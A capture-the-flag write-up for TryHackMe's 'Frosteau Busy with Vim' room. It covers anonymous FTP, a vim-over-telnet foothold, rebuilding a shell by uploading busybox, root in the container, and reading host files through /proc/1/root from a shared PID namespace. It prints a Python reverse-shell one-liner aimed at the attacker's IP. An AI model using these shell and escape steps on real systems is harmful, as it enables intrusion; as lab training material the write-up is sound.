Frosteau Busy with Vim

A Yujian (御剑) port scan finds ports 22, 80, 8065, 8095, 8085 and 8075 open.

Further scanning with nmap:

┌──(root㉿7)-[~/thm/Frosteau_Busy_with_Vim]
└─# nmap -A -p 22,80,8065,8095,8085,8075 10.10.41.204
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-26 18:58 CST
Nmap scan report for 10.10.41.204
Host is up (0.27s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 7b:53:bf:4a:24:0c:3f:22:a8:a0:88:4b:77:8c:0b:cf (RSA)
|   256 ac:fa:c4:a3:87:a6:44:75:e5:7e:25:70:eb:e5:aa:db (ECDSA)
|_  256 a2:5b:67:d5:3b:9a:6b:47:4f:74:a9:ab:07:48:6b:6a (ED25519)
80/tcp   open  http    Python http.server 3.5 - 3.10
|_http-title: Error response
|_http-server-header: WebSockify Python/3.8.10
8065/tcp open  telnet
| fingerprint-strings:
|   GenericLines, GetRequest, NCP, NULL, RPCCheck, SIPOptions, tn3270:
|     Ubuntu 22.04.3 LTS
|   Help:
|     Ubuntu 22.04.3 LTS
|_    HELP
8075/tcp open  ftp     BusyBox ftpd (D-Link DCS-932L IP-Cam camera)
|_ftp-bounce: bounce working!
| ftp-syst:
|   STAT:
| Server status:
|  TYPE: BINARY
|_Ok
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV IP 172.18.0.2 is not the same as 10.10.41.204
8085/tcp open  telnet
| fingerprint-strings:
|   NULL:
|     Ubuntu 22.04.3 LTS
|_    [...]
8095/tcp open  telnet
| fingerprint-strings:
|   GenericLines:
|     Ubuntu 22.04.3 LTS
|_    [...]
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 (98%), Linux 3.2 - 4.14 (96%), Linux 4.15 - 5.19 (96%), Linux 2.6.32 - 3.10 (96%), Linux 5.4 (94%), Linux 5.13 (92%), Linux 2.6.32 - 3.5 (92%), Linux 2.6.32 - 3.13 (92%), Linux 5.0 - 5.14 (92%), Android 9 - 10 (Linux 4.9 - 4.14) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 3 hops
Service Info: OS: Linux; Device: webcam; CPE: cpe:/o:linux:linux_kernel, cpe:/h:dlink:dcs-932l

Port 8075 runs FTP; try logging in anonymously as anonymous.

┌──(root㉿7)-[~/thm/Frosteau_Busy_with_Vim]
└─# ftp 10.10.158.69 8075
Connected to 10.10.158.69.
220 Operation successful
Name (10.10.158.69:root): anonymous
230 Operation successful
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 EPSV ok (|||36395|)
ftp: Can't connect to `10.10.158.69:36395': Connection refused
200 Operation successful
150 Directory listing
total 8132
-rw-r--r--    1 0        0             3010 Nov  5  2023 FROST-2247-SP.txt
-rw-r--r--    1 0        0             3211 Nov  5  2023 YETI-1125-SP.txt
-rw-r--r--    1 0        0               24 Nov  5  2023 flag-1-of-4.txt
-rw-r--r--    1 0        0               12 Nov  5  2023 flag-2-of-4.sh
-rw-r--r--    1 0        0          2127524 Nov  5  2023 frostling_base.png
-rw-r--r--    1 0        0          2305908 Nov  5  2023 frostling_five.png
-rw-r--r--    1 0        0          1589463 Nov  5  2023 yeti_footage.png
-rw-r--r--    1 0        0          2277409 Nov  5  2023 yeti_mugshot.png
226 Operation successful
ftp> get flag-1-of-4.txt
local: flag-1-of-4.txt remote: flag-1-of-4.txt
200 Operation successful
150 Opening BINARY connection for flag-1-of-4.txt (24 bytes)
100% |**************************************************************************************************************************************|    24        0.22 KiB/s    00:00 ETA
226 Operation successful
24 bytes received in 00:00 (0.22 KiB/s)
THM{Let.the.game.begin}

The other file, flag-2-of-4.sh, shows that flag 2 lives in an environment variable:

echo $FLAG2

Connecting to port 8085 with telnet drops straight into a vim instance.

telnet 10.10.41.204 8085

:!sh cannot be used to run commands.

However, :e can still be used to read files and directory listings.

:echo can print environment variables:

THM{Seems.like.we.are.getting.busy}

:version shows that python3 support is compiled in.

Trying a reverse shell from python3 fails, though:

:python3 import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.21.126.163",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")

The bin directories are all empty.

:echo $SHELL shows that the shell being invoked is /tmp/sh, which is actually an empty file.

No wonder the earlier attempts errored out.

Changing the shell path doesn't help either; there is no usable shell anywhere on the box.

:set shell=

So we have to rebuild this shell ourselves.

Upload a busybox binary over FTP:

ftp> put busybox
local: busybox remote: busybox
229 EPSV ok (|||46089|)
ftp: Can't connect to `10.10.158.69:46089': Connection refused
200 Operation successful
150 Ok to send data
100% |**************************************************************************************************************************************|  1104 KiB   78.69 KiB/s    00:00 ETA
226 Operation successful

Then in vim:

#open the uploaded busybox
:e /tmp/ftp/busybox
#save it as /tmp/sh
:w! /tmp/sh
#make it executable
:python3 import os;os.chmod("/tmp/sh", 0o777)

After reconnecting, :sh now drops into an interactive shell.

The problem is that no commands can be executed from it.

This comes down to how busybox works; see the first time I used busybox, in MoeCTF2024-wp | n0o0b's blog.

In short, busybox only runs the applet that matches its own file name. Since the binary is now called /tmp/sh, it can only behave as sh.

If the file is named busybox, it instead takes its first command-line argument as the applet name.

So we just need a copy of busybox that is actually named busybox. /tmp/ftp belongs to the ftp user and we have no write permission there, so we copy it into /tmp instead:

#open the uploaded busybox
:e /tmp/ftp/busybox
#save it as /tmp/busybox
:w! /tmp/busybox
#make it executable
:python3 import os;os.chmod("/tmp/busybox", 0o777)

Now arbitrary commands can be run, without copying out a separate ls, id, pwd and so on. At this point /tmp/sh and /tmp/busybox are byte-for-byte identical; /tmp/sh simply provides the interactive environment from which /tmp/busybox is invoked.
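As an added example (not from the original writeup), the applet-selection rule described above modelled in Python, with a small constructed applet table and an emulation of what busybox's --install -s does: it shows why /tmp/sh can only ever act as sh while /tmp/busybox can run any applet, and why the links in a directory on PATH make plain command names work.

```python
import os
import tempfile

# Constructed applet table: a small subset of the applets a real busybox build ships.
APPLETS = frozenset({"sh", "ash", "ls", "id", "pwd", "mkdir", "cat", "cp"})


def resolve_applet(argv, applets=APPLETS):
    """Return the applet a busybox binary would run for this argv, or None.

    Models the dispatch rule: the applet name is the basename of argv[0];
    only when that basename is 'busybox' does the next argument become the
    applet name. So '/tmp/sh ls' runs sh (with 'ls' as an argument), while
    '/tmp/busybox ls' runs ls.
    """
    if not argv:
        return None
    name = os.path.basename(argv[0])
    if name == "busybox":
        # Bare 'busybox' prints help, and '--install'/'--list' are handled
        # by busybox itself; neither is an applet.
        if len(argv) < 2 or argv[1].startswith("--"):
            return None
        name = argv[1]
    return name if name in applets else None


def install_links(busybox_path, bindir, applets=APPLETS):
    """Emulate 'busybox --install -s DIR': one symlink per applet, named after it.

    Each link's basename is the applet name, so resolve_applet() picks the
    right applet once DIR is on PATH. Returns the created link paths.
    """
    os.makedirs(bindir, exist_ok=True)
    links = []
    for applet in sorted(applets):
        link = os.path.join(bindir, applet)
        if os.path.lexists(link):
            os.remove(link)
        os.symlink(busybox_path, link)
        links.append(link)
    return links


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for link in install_links("/tmp/busybox", os.path.join(tmp, "bin")):
            print(link, "->", resolve_applet([link]))
```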

Rebuild the shell environment.

This only lasts for the current session:

:sh
/ $ /tmp/busybox mkdir /tmp/bin
/ $ /tmp/busybox --install /tmp/bin
/ $ export PATH="$PATH:/tmp/bin"
/ $ ls
bin     dev     home    lib32   libx32  mnt     proc    run     srv     tmp     var
boot    etc     lib     lib64   media   opt     root    sbin    sys     usr

Now on to getting root.

I uploaded linpeas to help with privilege escalation; it reports /etc/passwd as writable, but that seems useless here, since there is no SUID binary such as su.

Looking at the process list, the telnet service on port 8065 runs /usr/frosty/sh.

It has mode 777 and is empty, which explains why the telnet connection to 8065 exited immediately earlier.

/ $ ls -la /usr/frosty/sh
-rwxrwxrwx    1 root     root             0 Mar 27 07:20 /usr/frosty/sh

Fix it with busybox:

cp /tmp/busybox /usr/frosty/sh

Connecting to 8065 with telnet still gives no usable shell environment, because PATH has not been set up there.

Either add /tmp/bin to PATH, or use busybox again to rebuild the binaries in /bin:

/ # /tmp/busybox --install /bin
/ # id
uid=0(root) gid=0(root) groups=0(root)

Flag 3:

/ # cd /root
~ # ls
flag-3-of-4.txt
~ # cat *
THM{Not.all.roots.and.routes.are.equal}

There is a .dockerenv file in the root directory, so we are clearly inside a Docker container.

We need to escape from Docker.

ps shows processes running from /usr/bin, along with a bunch of processes that should not exist inside a Docker container.

We already know /usr/bin is empty here.

These are clearly the host's processes, visible inside the container because it shares the host's PID namespace!

If so, we can easily reach the host's filesystem through /proc/<pid>/root:

(unknown) # ls /proc/1/root/root
flag-4-of-4.txt  snap             yetikey3.txt
sh: getcwd: No such file or directory
(unknown) # cat /proc/1/root/root/*
THM{Frosteau.would.be.both.proud.and.disappointed}
cat: read error: Is a directory
3-d2dc6a02db03401177f0511a6c99007e945d9cb9b96b8c6294f8c5a2c8e01f60
sh: getcwd: No such file or directory
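From the defender's side, an added example (not part of the original writeup): an audit over constructed docker inspect output that flags containers started with --pid=host, which is the setting that makes host processes and /proc/<pid>/root visible here, plus an in-container heuristic for the same condition. The container names and ids in the sample are made up.

```python
import json
import os

# Constructed sample in the shape of `docker inspect <container>` output
# (a JSON array of container objects); only the fields this audit reads are set.
SAMPLE_INSPECT = json.dumps([
    {"Id": "0123abcd", "Name": "/frosty-vim",
     "HostConfig": {"PidMode": "host", "Privileged": False}},
    {"Id": "4567ef01", "Name": "/webapp",
     "HostConfig": {"PidMode": "", "Privileged": False}},
])


def audit_pid_namespace(inspect_json):
    """Flag containers started with --pid=host from docker inspect JSON.

    HostConfig.PidMode is 'host' for --pid=host and '' (or 'container:<id>')
    otherwise. A container in the host PID namespace sees every host process
    and, as root, can read the host filesystem through /proc/<pid>/root.
    """
    findings = []
    for c in json.loads(inspect_json):
        hc = c.get("HostConfig", {})
        findings.append({
            "name": c.get("Name") or c.get("Id"),
            "host_pid": hc.get("PidMode", "") == "host",
            "privileged": bool(hc.get("Privileged", False)),
        })
    return findings


def pid1_root_differs():
    """In-container heuristic: is PID 1's root a different filesystem root than ours?

    With an isolated PID namespace, PID 1 is the container's init and
    /proc/1/root is the same root as /. With --pid=host, PID 1 is the host's
    init and /proc/1/root is the host root. Stat on /proc/1/root needs
    ptrace-level access (normally root); returns None when it is denied.
    """
    try:
        here = os.stat("/")
        pid1 = os.stat("/proc/1/root")
    except OSError:
        return None
    return (here.st_dev, here.st_ino) != (pid1.st_dev, pid1.st_ino)


if __name__ == "__main__":
    for finding in audit_pid_namespace(SAMPLE_INSPECT):
        print(finding)
```

Run the audit over the real output of docker inspect on each container; any entry with host_pid set to True should be rebuilt without --pid=host unless that sharing is deliberate.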